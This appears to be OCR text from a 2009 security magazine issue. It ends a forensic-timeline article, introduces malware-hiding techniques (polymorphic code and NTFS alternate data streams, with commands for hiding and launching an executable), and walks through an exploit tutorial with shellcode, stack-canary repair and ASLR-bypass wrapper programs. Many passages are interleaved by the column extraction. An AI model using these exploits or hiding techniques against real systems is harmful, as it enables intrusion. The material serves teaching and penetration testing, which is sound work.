5/2009 HAKIN9 13 BASICS hive files stored in those Restore Points. Timeline Generation approach over simply extracting all Registry Applications have been written that are Data can be collected and a timeline can key names and their LastWrite times. For capable of extracting specific data from be generated using a variety of means. example, the userassist.pl RegRipper plugin Registry hive files, starting with the primary Perhaps the most preferable means for will extract time stamps from the binary hive file (i.e., System, Software, etc.) and generating the simplest timeline would be value data within UserAssist subkeys, then progressing down through each to acquire an image of the target system, providing the analyst with a time stamped Restore Point, locating the particular and then using the acquired image, view of activity associated with that user corresponding hive file and then extracting extract time stamped data. account. Also, LastWrite times from Registry the same data, providing a valuable keys associated with MRU lists can provide historical view of the system. Similar data TSK Tools additional context (i.e., the LastWrite time can be retrieved from Windows Vista For example, fls.exe from the TSK tools was updated with a specific file was Volume Shadow Copies. will allow you to extract file system data viewed) to the data. Once again, scripting such as file names and paths, as well as languages such as Perl are extremely Memory Dumps file modified, last accessed, created and well suited to parsing binary data formats, Memory dumps can be an invaluable entry modified (MACE) dates. FTK Imager translating time stamp information, and source of time stamped data, as well. A will allow you to export similar information, providing output in the five field format. memory dump is a snapshot in time of albeit without the file entry modified times. the contents of physical memory from a MFTRipper from Mark Menz of MyKey Additional Sources system, and will contain time stamped Technology, Inc. will allow you to parse Tools written in Perl can extract data from information such as process start times the NTFS MFT for file system data, as Windows Event Logs, Windows XP and (and exit times, for completed processes), well. If necessary for scoping, file system Vista Prefetch files, and Recycle Bin INFO2 as well as Registry hive files and Event Log metadata information can be derived files, as well as a variety of other files. records. Correlating process start times from a live system using tools such as the Many of these files consist of a proprietary to when the system was booted, as well stat() function available to the Perl and binary format that has been understood as file system data may allow an analyst Python scripting languages. The output of and documented, so that extraction tools to identify an initial source of malware whichever tool or technique is used should or scripts can be written in order to filter infection or compromise to a system. be considered to be an intermediate and retrieve timestamped data. Sources for timeline data can include format, and additional translation to the much more than simply files from a five field format described above will be Using Perl single system. Activity on a system can required; scripting languages such as Perl The Perl scripting language is freely be correlated with logs from firewalls are ideally suited for this sort of task. available, as well as available on a number and other network devices, as well as of popular platforms. The use of Perl as from other systems on the network. RegRipper a basis for writing tools or filters to extract Incidents during which an intruder hops Once the file system information has been data from various files provides for quick from system-to-system (via Terminal extracted from the image, specific files prototyping, as well as easily-read and Services, Windows networking, VNC, etc.) can then also be extracted and parsed shared code. The Perl DateTime module are ideal for correlation of events across for time stamped information. Tools such allows the analyst to easily translate the multiple systems as well as from VPN as RegRipper allow the analyst to extract familiar date/time format seen in AV concentrators, firewalls, even IDS/IPS specific time stamped data from Registry application and Internet Information Server systems. hive files, providing a much preferable (IIS) web server logs (most often a human- understandable format, such as 2008-07- References 12 12:33pm or something similar) into the normalized Unix epoch time format. This • Windows Forensic Analysis, Second Edition (Syngress, 2009) normalized time allows for sorting of events based on a common format, once time On the ‘Net zones (translating to Universal Coordinated Time, or UTC) and clock skew have been • http://sourceforge.net/projects/ex-tip/ – Michael Cloppert’s work on ex-tip taken into account. This way, events that • http://www.regripper.net/ – The tool for Windows Registry Analysis occurred relatively close to each other can • http://www.sleuthkit.org/ – The SleuthKit (TSK) tools, by Brian Carrier • http://www.forensicswiki.org/wiki/Timeline_Analysis_Bibliography – ForensicWiki Timeline easily be viewed as such. Analysis Bibliography • http://www.foundstone.com/us/resources-free-tools.asp – FoundStone Network Security Scope and Nature of an free tools Incident • http://www.mandiant.com/software/webhistorian.htm – Mandiant WebHistorian Timeline generation and analysis can • http://www.epochconverter.com/epoch/functions-perl.php – Perl epoch converter routines be extremely valuable in determining
14 HAKIN9 5/2009 Further Readings This article will be followed by two additional articles that walk through developing a timeline for analysis as a practical exercise. Using a Windows image that is freely available for download on the Internet, you'll be able to follow along as we develop a timeline of activity on the system. The first article will provide the basis for the timeline development and illustrate extracting timeline information from some basic sources; the second article will follow up by illustrating extracting timeline information from advanced sources. Stay tuned!
the scope and nature of an incident. such cases, generating timeline data Analysts generating timelines of data have for transmittal to off-site resources determined incident windows previously allows the on-site responder to provide unnoticed by the victim, finding that the data for offload analysis work that precipitating intrusion had taken place is conducted in parallel with on-site days, weeks, or months prior to the activities, and receive back pertinent victim identifying unusual or suspicious information to assist in developing an activity. Many times, a complete timeline incident scope, without worrying about is not necessary in order to identify an inadvertently compromising sensitive incident window or a precipitating event. (i.e., credit card) data. This is not specific An abbreviated timeline using several to PCI investigations, and can be used sources, such as AV application logs and to optimize and parallelize investigative Event Logs, may provide sufficient data to efforts across multiple analysts, without identify the incident window, allowing the exposing or compromising sensitive data. analyst to target only specific information from other sources, or extracting and Conclusion correlating NTUSER.DAT hive files from Generating a timeline of activity from a multiple systems may be all that is required system or from multiple sources can to sufficiently establish an incident window. provide analysts with a means of data reduction while at the same time optimizing Advantages analysis and reporting. Generating a Generating timeline data for analysis in timeline in the manner described in the manner described in this article has this article is largely a manual process, a number of useful advantages, the first as there are currently no commercial of which is the correlation of multiple tools that automate the collection and events from a system (or acquired presentation of the scope of data available. image) or systems into a unified, sorted In many cases, new data sources may format for visualization. This can lead to be discovered, requiring the creation of significant data reduction, particularly if custom filters to translate the available data a specific incident window is known for into a prescribed timeline format. However, the event being investigated. Alternatively, the benefits of creating timelines in this the timeline analysis can lead to the manner far outweigh the effort required to determination of that incident window. generate the timeline, and timeline analysis Another significant advantage to the as described in this article will undoubtedly use of this form of analysis pertains to become a standard component of forensic investigations involving sensitive data; investigations. for example, credit card data as part of a Payment Card Industry (PCI) forensic incident assessment following a potential Harlan Carvey Harlan Carvey is an incident responder and computer breach. Deadlines for reporting are forensic analyst based in the Metro DC area. He has imposed on certified responders, who considerable experience speaking at conferences on computer forensic and incident response topics, walk into an unfamiliar infrastructure and and is the author of several books, including Windows must spend considerable time becoming Forensics and Incident Recovery (AWL, 2004), Windows Forensic Analysis (Syngress, 2007), and is a co-author familiar with the environment, as well for Perl Scripting for Windows Security (Syngress, 2007). mapping the customer’s network and The second edition of his Windows Forensic Analysis will be available June, 2009 and is currently available for credit card transaction flow for them. In pre-order on Amazon.com.
14 HAKIN9 5/2009 BASICE
JASON CARPENTER Analyzing Malware Introduction to Advanced Topics
Difficulty
In this final article in our three-part series on analyzing malware we will discuss more advanced topics. The topics we are going to include are: polymorphic code, metamorphic code, and alternative data stream.
fter that we will conclude by discussing In this article, first, let us discuss the the benefits and drawbacks to automatic difference between polymorphic and A analysis. At the end of the article there metamorphic code. Polymorphic Code is code will be a list of places to find more resources on that mutates while maintaining its original customizing(and scripting) your ability to analyze algorithm. Whereas metamorphic code is malware. I hope you will understand by reading code that is programmed to rewrite itself these three articles that no two people will usually translating the code into a temporary analyze malware the same way and it will take representation, editing the temporary creation time to find your own way to analyze malware and writing itself back to the original code. quickly and effectively. However, first lets review part one and two of this series. Polymorphic Code Most antivirus scanners rely on recognizing Synopsis of previous parts of patterns in viral code. Polymorphic code has Analyzing Malware to decrypt the viral code with an unpredictable In part one, we discussed why it is important to decryption process. This keeps the code from WHAT YOU SHOULD analyze malware. We discussed some common KNOW tools we can use to analyze malware. At this An overview of the analyzing malware process. By now you point we discussed how to setup an environment should be able to reverse simple that will allow us to isolate the malware. While ��������������� malware, but probably would have ran into some interesting analyzing a simple type of malware, we discussed code. the difference between behavioral and code ������ analysis. WHAT YOU WILL In part two we discussed what a portable LEARN... ������� executable was, and dissected the headers to We will learn a little about more advanced topics such as help us analyze malware. We learned what the polymorphic and metamorphic relative virtual address is and the importance ��������� code, as well as hiding in ADS. of the Windows Import Address Table. We found This will be a brief introduction out that PE-Packers, while initially designed to to these topics to familiarize you ������ with them, so you can recognize help condense code has become a way for them in the wild. malware authors to hide their code. Therefore There will be references to get we discussed ways to unpack their code and more information on these topics. used the storm worm as an example. Figure 1. The stages of Metamorphic Code
16 HAKIN9 5/2009 INTRODUCTION TO ADVANCED TOPICS
being predictable. If there is no constant to perform the transformation. It must transform itself. Essentially it requires bytes in each generated decryption recognize itself in order to know how to disassembly, though it may also need to routine, virus detectors cannot rely on a simple pattern match to locate these viruses. Instead, they are forced to use an heuristic algorithmic that is susceptible to false positives, misleading reports of the existence of the virus where it is not truly present, or run the risk of missing copies of the virus allowing it to survive and propagate. An example of polymorphic code, in assembly,
mov ax, 808h could be replaced with
mov ax, 303h ; ax = 303h mov bx, 101h ; bx = 101h add ax, bx ; ax = 404h Figure 2. Saving a Text File shl ax, 1 ; ax = 808h
The registers are encoded in a random order. The counter variable, for example, should not always be the first to be encoded.
Metamorphic Code Metamorphism is the ability of malware to completely transform its code. While originally it was a difficult task to create metamorphic code, there now exist several metamorphic engines, programs that create the logic for transforming code, that can be linked to any malware making it metamorphic. Metamorphic Figure 3. File size of Text File malware is either self-contained or extends its capability by communicating with the world, for example by downloading plug-ins from the web. Metamorphic code goes through five stages in order to be truly metamorphic. These five stages are: Locate its Own Code, Decode, Analyze, Transform, and Attach. Locate its Own Code. A metamorphic engine must be able to locate the code to be transformed. Parasitic metamorphic malware, which transforms both its own code and its host, must be able to locate its own code in the new variant. Decode. The metamorphic engine will need to decode required information Figure 4. Shows hiding executable, size does not change and how to start executable
5/2009 HAKIN9 17 BASICE
decode other types of information it may Alternative Data Streams C:\WINDOWS>start .\textfile.txt:not.exe require in order to perform an analysis Another way that malware writers try or transformation. The information is to hide their code is in Alternative Data As you can see this is a way for malware usually encoded in the malware body Streams (ADS). ADS is an often forgotten authors to hide executables in a place data segments, or in the code itself. feature of NTFS. It allows you to fork that is difficult to find. While there are tools Some examples include using flags, bits, file data into existing files. This does out there to find files hidden in ADS, you markers, or hints. not affect their size or functionality, nor have to know that ADS is there first. If, Analyze. In order for the metamorphic does it show up in standard browsing while analyzing malware, an executable is transformations to work information software like Microsoft Windows Explorer. running that you cannot locate ADS is a needs to be available. When the required ADS is used by a variety of programs good place to look. information is not made explicitly available to store file information. However it has and decoded, it must be constructed by also become a useful place to store Conclusion the engine itself. The control flow graph executable malware. In the first article, I briefly discussed (CFG) of the program is one piece of that I believe that all companies should information that is frequently required for An Example perform analysis of any malware that analysis and transformation. It is used, to Save a text file, let’s call it textfile.txt. Let’s infects them. This allows them to verify rewrite the control flow logic of a program look at the file size Figure 3. exactly what occurred on their network if a transformation requires expanding the Next we put an executable behind it, instead of relying on AV vendors. size of code. let’s use notepad.exe. However, it would be wrong to believe Transform. The Transform step that I don’t understand that most replaces instruction blocks in the C:\WINDOWS>type information security officers are already code with the transformed equivalent. notepad.exe>textfile.txt:not.exe pressed for time. Of course they are, Some examples of metamorphic however that does not mean they can transformations include register renaming, Now we will confirm that the file size has neglect malware. Therefore we need to code substitution, NOP insertion, garbage not changed. find ways to speed up malware analysis. insertion, and instruction reordering within Here is how we run our hidden Most people, when considering ways a block. executable. Notice the .\ in front of the to speed up malware analysis initially Attach. Parasitic metamorphic file name; this is required so the start look towards automated tools. In order malware attaches the new version to a command knows the correct path to the to automate some of malware analysis host file. file Figure 4. without offloading the entire process to a third-party, you can script parts of the analysis. It is possible to script both Further Resources behavioral and static analysis to a point. Automated Virus Analysis – Online However, this is only as effective if the Submiting potential infected files often will generate reports. Cwsandbox.org malware is fairly simple. Once more advanced techniques get involved you • Norman Sandbox Information Center http://www.norman.com/microsites/nsic/en-us are going to need human intervention. • ThreatExpert http://www.threatexpert.com/ Ultimately, malware analysis comes • Virus Total http://www.virustotal.com/ down to a cat and mouse game. As we develop ways to analyze malware, Reversing Resources malware authors come up with new A good place to start if you are learning how to reverse, an important requirement for ways to hide the malware. The best understanding how to reverse malware. way to speed up malware analysis is • Open RCE http://www.openrce.org/articles/ to combine as much possible scripting • Tuts4u http://forum.tuts4you.com/index.php?s=819de41a7dbe99986c03ad67e8a05374& while analyzing the results and the malware by hand. Live Malware Samples online Can't practice if you can't get infected files.
• http://www.offensivecomputing.net/
Books Jason Carpenter Interesting book Jason Carpenter has been in IT for 10 years now, doing Reversing: Secrets of Reverse Engineering by Eldad Eilam everything from programming to administering networks. I am currently completing my master’s degree in Information Assurance.
18 HAKIN9 5/2009
ATTACK
STEPHEN SIMS Hacking ASLR & Stack Canaries on Modern Linux
Difficulty
This article will demonstrate methods used to hack stack canaries and Address Space Layout Randomization (ASLR) on modern Linux kernels running the PaX patch and newer versions of GCC.
hese methods have been privately known There are quite a few stack protection tools and publicly disclosed by myself and available with different operating systems and T multiple other researchers over the years, vendor products. Two of the most common Linux- but not in great detail. The methodology attempts based stack protection tools are Stack-Smashing to demonstrate examples of modern hacking Protector (SSP) and StackGuard. techniques during conditional exploitation. As you add additional patches such as grsecurity, Stack-Smashing Protector (SSP) exploitation becomes even more challenging. SSP, formerly known as ProPolice is an extension Much of the content has been pulled from to the GNU C Compiler (GCC) available as a my course SEC709 Developing Exploits for patch since GCC 2.95.3, and by default in GCC Penetration Testers and Security Researchers offered by the SANS Institute.
Stack Protection To curb the large number of stack-based attacks, several corrective controls have been put into WHAT YOU SHOULD ������ KNOW... place over the years. One of the big controls added is Stack Protection. From a high level the Readers should have an understanding of standard idea behind stack protection is to place a 4-byte stack based overflows on x86 value onto the stack after the buffer and before ������ architecture, as this article builds off of that knowledge. the return pointer. On UNIX-based OS’ this value
Readers should have an is often called a Canary, and on Windows-based ��� understanding of modern OS it is often called a Security Cookie. If the value operating system controls added over the years. is not the same upon function completion as �� when it was pushed onto the stack, a function is ��������� WHAT YOU WILL called to terminate the process. As you know, you LEARN... must overwrite all values up to the Return Pointer ��������� Readers will gain knowledge on (RP) in order to successfully redirect program various methods used to defeat modern security controls under execution. By the time you get to the return pointer, conditional situations. you will have already overwritten the 4-byte stack Readers will be able to add protection value pushed onto the stack, thus additional tricks to their pen- testing arsenal. resulting in program termination (see Figure 1). Figure 1. Stack with Canary
20 HAKIN9 5/2009 HACKING ASLR AND STACK CANARIES
4.1. SSP is based on the StackGuard Null Canary In the Figure 2 we first launch the protector and is maintained by Hiroaki Probably the weakest type of canary is canary program with no arguments. We Etoh of IBM. Aside from placing a the Null Canary. As the name suggests, see that it requires that we enter in a random canary on the stack to protect the canary is a 4-byte value containing username, password, and PIN. On the the return pointer and the saved all 0’s. If the 4-byte value is not equal to 0 second execution of canary we give it frame pointer, SSP also reorders local upon function completion, the program is the credentials of username: admin, variables protecting them from common terminated. password: password and PIN: 1111. We attacks. If the urandom strong number get the response that authentication has generator cannot be used for one Defeating Stack Protection failed as we expected. reason or another, the canary falils back For this example I will use a method Finally we try entering in the to a Terminator Canary. that allows us to repair the Terminator username: AAAAAAAAAAAAAAAA , the Canary used by SSP on newer password: BBBB and the pin: CCCC. The StackGuard versions of Kubuntu. You will notice response we get is: StackGuard was created by Dr. Cowan over time that under certain conditions, and uses a Terminator Canary to protect controls put in place to protect areas Authentication Failed the return pointer on the stack. It was of memory can often be bypassed “*** stack smashing detected included with earlier versions of GCC and or defeated. Again, this is conditional ***: ./canary has been replaced by SSP. You can read exploitation. Below is the vulnerable terminated more about Dr. Cowan at: code (see Listing 1). Aborted (core dumped) http://immunix.org. Listing 1. Canary.c Terminator Canary The idea behind a Terminator Canary /*Program called canary.c*/ is to cause string operations to terminate #include
0x00000aff. When a function such as char user[8]; is used to overrun the buffer strcpy() char pass[8]; and a Terminator Canary is present char pin[8]; using the value 0x00000aff, strcpy() will fail to recreate the canary due to the strcpy(user, input_one); strcpy(pass, input_two); null terminator value of 0x00. Similar to strcpy(pin, input_three); strcpy(), gets() will stop reading and printf("Authentication Failed\n\n"); return 0; copying data once it sees the value 0x0a. StackGuard used the Terminator Canary } value 0x000aff0d . int main(int argc, char* argv[]) { Random Canary if(argc <4){ A preferred method over the Terminator printf("Usage:
5/2009 HAKIN9 21 ATTACK HACKING ASLR AND STACK CANARIES
You can quickly infer that this is the in AAAAAAAA for the first argument, goal of a terminator canary is to terminate message provided on a program BBBBBBBB or the second argument, string operations such as strcpy() and compiled with SSP for stack protection. and CCCCCCCC for the third argument. gets(). These commands can be seen in Now that we know SSP is enabled, Now enter the command x/20x $esp Figure 3. we must take a look in memory to see and locate the values you entered. Let's quickly see if we can repair the what type of canary we’re up against. By Immediately following the A’s in memory canary by entering it in on the first buffer running GDB and setting a breakpoint you will find the terminator canary value and attempt to overwrite the return pointer after the final of three strcpy()’s in the of 0xffa00000. Remember this is in little with A’s. Try using the command: testfunc() function, we can attempt to endian format and the value is actually locate the canary. By probing memory 0x00000aff. You should also be able to run “AAAAAAA `echo –e ‘\x00\x00\x0a\ you can easily determine that each of the quickly identify the return address value xffAAAAAAAAAA’`” three buffers created in the testfunc() 4-bytes after the canary showing the BBBBBBBB CCCCCCCC function allocate 8-bytes. Try entering address of 0x08048517. Remember, the As you can see, with the above command we are filling the first buffer with A’s, trying to repair the canary and then place enough A’s to overwrite the return pointer. When issuing this command and analyzing memory at the breakpoint, you can see that the canary
shows as 0x4141ff0a and the return pointer shows as 0x41414141. When letting the program continue, it fails, as Figure 3. Breakpoint with Normal Canary the canary does not match the expected
0x00000aff. Notice the message at the bottom, “*** stack smashing detected ***” letting us know again that SSP is enabled. The strcpy() function stops copying when hitting the
null value 0x00 and our attack fails. The strcpy function can, however, write one null byte. With this knowledge, let's continue the attempt to defeat the canary. The results of the above commands are provided in Figure 4. This time let's take advantage of all three buffers and the fact that the
strcpy() function will allow us to write one null byte. Try entering in the Figure 4. Broken Canary command:
run “AAAAAAA `echo –e ‘AA\x0a\ xffAAAAAAAA’`” “BBBBBBBBBBBBBBBBB” “DDD DDDDDDDDDDDDDDDDDDDDD”
As you can see in the Figure 5, we’ve successfully repaired the canary and overwritten the return pointer with a series of A’s. When we continue program execution, we do not get a stack smashing detected message, we instead get a normal segmentation fault message showing EIP attempted to access memory
Figure 5. Repaired Canary at 0x41414141.
22 HAKIN9 5/2009 5/2009 HAKIN9 23 ATTACK HACKING ASLR AND STACK CANARIES
Since we now know that we can The control of this feature is located in see, the middle two bytes have changed,
repair the canary, let's see if we can the file randomize _ va _ space, which but some bytes remained static. This is execute some shellcode. We will place resides in the /proc/sys/kernel often the case, depending on the number our shellcode after the return pointer, directory on Ubuntu and similar locations of bits that are part of the randomization.
since there is not enough space within the on other systems. If the value in this file is The mmap() system call only allows for buffer. In order to do this we must locate a 1, ASLR is enabled, and if the value is a 16-bits to be randomized. This is due to our shellcode within memory and add 0, ASLR is disabled. its requirement to be able to handle large in the proper return address that simply In order to ensure that stacks continue memory mappings and page boundary jumps down the stack immediately after to grow from higher memory down alignment. the return pointer. I have added in eight towards the heap segment and vice versa NOP’s to make it slightly easier to hit the without colliding, the Most Significant Bit’s Defeating ASLR exact location. Below is the script to run (MSB)’s are not randomized. For example, Depending on the ASLR implementation,
within GDB to successfully execute our let's say the address 0x08048688 was the there may be several ways to defeat the shellcode (see Listing 2 and Figure 6). The location of a particular function mapped randomization. PaX’s implementation of shellcode I am using simply issues the into memory by an application during ASLR uses various types of randomization command apt-get moo which is an Easter one instance. The next several times you between 16-24 bits in multiple segments.
egg as seen in the Figure 7. launch the program, the location of that The delta _ mmap variable handles the As you can see in the Figure 7, our same function may be at 0x08248488, mmap() mapping of libraries, heaps, and shellcode was successfully executed, 0x08446888 and 0x08942288. As you can stacks. There are 2^16 = 65536 possible giving us the Debian Easter Egg that shows an ASCII cow and the phrase: Have Listing 2. Script with Shellcode you mooed today? At this point we have walked through an example of defeating a run "AAAAAAA 'echo -e '\x42\x43\x0a\xffAAAA\x90\xf6\xff\xbf\x90\x90\x90\x90\x90\x90\ stack canary. x90\x90\x29\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x24\xf4\x5b\x81\ x73\x13\x35\xb0\xb8\xc4\x83\xeb\xfc\xe2\xf4\x5f\xbb\xe0\x5d\ x67\xd6\xd0\xe9\x56\x39\x5f\xac\x1a\xc3\xd0\xc4\x5d\x9f\xda\ PaX and Defeating ASLR xad\x5b\x39\x5b\x96\xdd\xbc\xb8\xc4\x35\xd1\xc8\xb0\x18\xd7\ PaX was released back in 2000 for xdd\xb0\x15\xdd\xd7\xab\x35\xe7\xeb\x4d\xd4\x7d\x38\xc4''" systems running Linux. The primary "BBBBBBBBBBBBBBBBB" "DDDDDDDDDDDDDDDDDDDDDDDD" objective was to protect memory from being exploited by attackers. One method was to make eligible pages of memory non-writable or non-executable whenever appropriate. ASLR is another control introduced that randomizes the memory location of the stack segment, heap segments, shared objects and optionally, the code segment within memory. For Figure 6. Script with Shellcode in GDB example, if you check the address of the
system() function you will see that its location in memory changes with each instance of the programs execution. If an attacker is trying to run a simple return-to- libc style attack with the goal of passing
an argument to the system() function, the attack will fail, since the location of
system() is not static. The mmap() function is responsible for mapping files and libraries into memory. Typically, libraries and shared objects
are mapped in via mmap() to the same location upon startup. When mmap() is randomizing mappings, the location of the desired functions are at different locations upon each access request. As you can imagine, this makes attacks more difficult. Figure 7. Successful Execution
22 HAKIN9 5/2009 5/2009 HAKIN9 23 ATTACK HACKING ASLR AND STACK CANARIES addresses of where a function is located may allow an attacker to grab the required The interesting thing about attacking in memory. When brute forcing this space, addressing to successfully execute code ASLR is that a method that works when the likeliness of locating the address of and bypass ASLR protection. This is often exploiting one program, often times will not the desired function is much lower than the case since once a parent process has work on the next. You must understand the this number on average. Let's discuss started up, the addressing for that process various methods available when exploiting an example. If a parent process forks and all child processes remain the same ASLR and scan the target program out multiple child processes that allow throughout the processes lifetime. If an thoroughly. Remember, when it comes an attacker to brute force a program, attacker does not have to be concerned to hacking at canaries, ASLR and other success should be possible barring the with crashing a child process, multiple controls, you must at times understand the parent process does not crash. This is format string attacks may supply them program and potentially the OS it is running often the case with daemons accepting with the desired information. on, better than its designer. One data copying multiple incoming connections. If you function may very easily allow you to repair a must restart a program for each attack Locating Static Values canary, while another may be impossible. It is attempt, the odds of hitting the correct Some implementations of ASLR do not when faced with this challenge that you must address decreases greatly, as you are randomize everything on the stack. If think outside the box and search through not exhausting the memory space. You static values exist within each instance memory for alternative solutions. Every byte also have the issue of getting the process of a program being executed, it may be mapped into memory is a potential opcode to start back up again. In the latter case, enough for an attacker to successfully for you to leverage. using large NOP sleds and maintaining gain control of a process. By opening a a consistent address guess may be program up within GDB and viewing the Opcodes of Interest the best solution. Using NOP’s allows location of instructions and variables Some opcodes that may provide us with a successful attack as long as we fall within memory, you may discover some opportunities to exploit ASLR include Ret- somewhere within the sled. consistencies. This is the case Linux to-ESP, Ret-to-EAX, Ret-to-Ret and Ret-to- kernel 2.6.17 and the linux-gate.so.1 Ptr. Let’s discuss each one of them in a Data Leakage VDSO. Inside linux-gate.so.1 was a jmp little more detail. Format string vulnerabilities often allow esp instruction located at memory you to view all memory within address 0xfffe777. This served as a • Ret-to-ESP This is the one just a process. This vulnerability may allow you trampoline for shellcode execution as mentioned which takes advantage of to locate the desired location of a variable seen with vulnerable programs such as a system using ASLR running Kernel or instruction in memory. This knowledge ProFTPD 1.3.0. version 2.6.17. The idea is that the ESP register will be pointing to a memory address immediately following the location of the previous return pointer location when a function has been torn down. Since the ESP register is pointing to this location, we should be able to place our exploit code after the return pointer location of a vulnerable Figure 8. Segmentation Fault function and simply overwrite the return pointer with the memory address of a jmp esp or call esp instruction. If successful, execution will jump to the address pointed to by ESP, executing our shellcode. • Ret-to-EAX comes into play when a calling function is expecting a pointer returned in the EAX register that points to a buffer the attacker can control. For example, if a buffer overflow condition exists within a function that passes back a pointer to the vulnerable buffer, we could potentially locate an opcode that performs a jmp eax or call eax and overwrite the return pointer of the Figure 9. ASLR is Enabled vulnerable function with this address.
24 HAKIN9 5/2009 5/2009 HAKIN9 25 ATTACK HACKING ASLR AND STACK CANARIES
• Ret-to-Ret is a bit different. The idea have been removed. We can no longer Checking for BoF here is to set the return pointer to the reliably use linux-gate.so.1 as a method Let’s determine if the aslr _ vuln address of a ret instruction. The idea of bypassing ASLR, although it still often program is vulnerable to a simple stack behind this attack is to issue the ret remains static. overflow by passing it in some A’s. You instruction as many times as desired, Memory leaks such as format string can see that four A’s does not trigger a moving down the stack four bytes at a vulnerabilities may be one method of segmentation fault, but using Python to time. If a pointer resides somewhere learning about the location of libraries pass in 100 A’s, we cause a segmentation on the stack that the attacker can and variables within a running process, fault (see Figure 8). control, or control the data held at the but without such luck we need to think Let’s try and run the program inside pointed address, control can be taken outside of the box a bit. How about of GDB to get a closer look. I will run via this method. wrapping a program within another the program with 100 A’s first. You will
• Ret-to-Ptr is an interesting one. program in an attempt to have a bit more likely not see 0x41414141 during the Imagine for a moment that you control about the layout of the program. segmentation fault as you would expect. discover a buffer overflow within a It just so happens that it works when Part of this has to do with the fact that vulnerable function. Once you cause using particular functions to open up the ASLR will often generate strange results a segmentation fault, often times vulnerable program. when causing exceptions. Another we’ll see that EIP has attempted to reason for the behavior has to do
jump to the address 0x41414141. This Vulnerable Program with the fact that the behavior of the address is of course being caused by Below (see Listing 3) is a simple Proof of segmentation fault is often related to our use of the A character. When we Concept (PoC) program that introduces how and where a function is called. If generate this error, we can type in info an obvious vulnerability by using the you reduce the number of A’s down to
reg into GDB and view the contents strcpy() function. 48, you should see some difference in of the processor registers. More often than none, several of the registers Listing 3. Vulnerable Code will be holding the address or value
0x41414141. Let’s say for example /* Name this program aslr_vuln.c and compile as aslr_vuln using the –fno-stack- that the EBX register is holding the protector compile option. */
value 0x414141. This may indicate that this value has been taken from #include
24 HAKIN9 5/2009 5/2009 HAKIN9 25 ATTACK
Listing 6. Modified Wrapper Program
#include
int main(int argc, char *argv[]) { char buffer[48]; int i, junk; printf("i is at: %p\n", &i); memset(buffer, 0x41, 48); execl("./aslr_vuln", "aslr_vuln", buffer, NULL); }
Listing 7. Wrapper with Shellcode
#include
char shellcode[]= "\x31\xc0\x31\xdb\x29\xc9\x89\xca\xb0"\ "\x46\xcd\x80\x29\xc0\x52\x68\x2f\x2f"\ // Our shell-spawning shellcode "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"\ "\x52\x54\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char *argv[]) { char buffer[200]; // Our buffer of 200 bytes int i, ret; // Our variable to reference based on it’s mem address and our RP variable ret = (int) &i + 200; // The offset from the address of i we want to set our RP to… printf("i is at: %p\n", &i); printf("buffer is at: %p\n", buffer); // Some information to help us see what’s going on.. printf("RP is at: %p\n", ret); for(i=0; i < 64; i+=4) // A loop to write our RP guess 16 times…. *((int *)(buffer+i)) = ret; memset(buffer+64, 0x90, 64); // Setting memory at the end of our 16 RP writes to 0x90 * 64, our NOP sled… memcpy(buffer+128, shellcode, sizeof(shellcode)); // Copying our RP guess, NOP sled and shellcode execl("./aslr_vuln", "aslr_vuln", buffer, NULL); // Our call to execl() to open up our vulnerable program… }
Listing 8. Modified Offset
#include
char shellcode[]= "\x31\xc0\x31\xdb\x29\xc9\x89\xca\xb0"\ "\x46\xcd\x80\x29\xc0\x52\x68\x2f\x2f"\ // Our shell-spawning shellcode "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"\ "\x52\x54\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char *argv[]) { char buffer[200]; // Our buffer of 200 bytes int i, ret; // Our variable to reference based on it’s mem address and our RP variable ret = (int) &i + 60; // The offset from the address of i we want to set our RP to… modified version that should work! printf("i is at: %p\n", &i); printf("buffer is at: %p\n", buffer); // Some information to help us see what’s going on.. printf("RP is at: %p\n", ret); for(i=0; i < 64; i+=4) // A loop to write our RP guess 16 times…. *((int *)(buffer+i)) = ret; memset(buffer+64, 0x90, 64); // Setting memory at the end of our 16 RP writes to 0x90 * 64, our NOP sled… memcpy(buffer+128, shellcode, sizeof(shellcode)); // Copying our RP guess, NOP sled and shellcode execl("./aslr_vuln", "aslr_vuln", buffer, NULL); // Our call to execl() to open up our vulnerable program… }
26 HAKIN9 5/2009
ATTACK the behavior of the segmentation fault and where EIP is trying to jump. Run it a few times with 48 A’s and you should eventually see the expected 0x41414141 inside of the EIP register. Each time your segmentation fault is successful, you can use the p $esp command in GDB to print the address held in the stack pointer. You should notice that it changes each time you execute the program due to the randomization of the stack segment. At this point we can count out Figure 10. Running with First Wrapper our traditional return to buffer style attack and have verified that ASLR is enabled (see Figure 9). I’ll next set up a breakpoint inside of GDB on the function main() with the command, break main and run the program with no arguments. When execution reaches the breakpoint, you can type in p system, record the address and rerun the program. When typing in the p system command again Figure 11. Running with Updated Wrapper when the program pauses you should notice that the location of the system() function is mapped to a different address each time you execute the program. This would lead us to believe that a simple return-to-libc attack would also prove difficult. At this point we know that the stack is located at a new address with every run of the program. We know that system Figure 12. Checking Return Pointer libraries and functions are mapped to different locations within the process space as well. We know that 20-bits seems to be used in the randomization pool for some of the mapped segments. It is pretty obvious that brute-forcing is not Figure 13. Adjusted Return Pointer the best approach to defeating ASLR on this system.
Let’s next try wrapping the aslr _ vuln program with another C program we control and use the execl() function to open it. According to the Linux help page for the exec() family of functions, The exec family of functions replaces the current process image with a new process image. This could potentially have an affect on ASLR, but let’s first see if we can even cause a segmentation fault (see Listing 4). Let’s first create a simple C program that uses the execl() function to open up the vulnerable aslr _ vuln program We’ll Figure 14. Successful Exploitation
28 HAKIN9 5/2009 HACKING ASLR AND STACK CANARIES
create a buffer of 100 bytes and pass in can use the address of this variable as Conclusion a bunch of capital A’s to see if we can get a reference point once the process is Again, the methods shown in this article
EIP to try and jump to 0x41414141. The replaced by execl(). It is not an exact are conditional, as are most modern code can be seen in the Listing 5. science as to the behavior of where in methods of locating and successfully
Compile it with: gcc –fno-stack- memory things may be moved to, but performing 4-byte overwrites. Many protector aslr-test1.c –o aslr- generally they stay in the same relative researchers feel that it is only a matter test1 (see Figure 10). area. We can then create an offset from of time before this genre of exploitation As you can see we seem to be the address of our variable to try and is impossible. However, as long as there causing a segmentation fault, but are cause the return pointer to land within are poorly configured systems, outdated not causing EIP to jump to the address our NOP sled. Let’s take a look at our OS’ and complacency existing within
